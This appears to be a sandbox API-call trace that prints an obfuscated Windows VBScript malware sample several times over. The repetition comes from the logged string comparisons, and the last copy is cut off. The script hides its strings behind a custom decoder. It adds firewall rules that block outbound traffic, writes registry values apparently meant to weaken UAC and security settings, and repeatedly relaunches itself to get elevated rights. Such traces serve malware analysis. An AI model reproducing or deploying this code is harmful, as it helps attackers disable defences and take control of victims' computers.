bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 88 [0222.926] wcsncmp (_String1="x = 0\r\nsdfheCHAVE7 = 1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 107 [0222.926] wcsncmp (_String1=" = 0\r\nsdfheCHAVE7 = 1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0222.926] wcsncmp (_String1="= 0\r\nsdfheCHAVE7 = 1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 48 [0222.926] wcsncmp (_String1=" 0\r\nsdfheCHAVE7 = 1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), 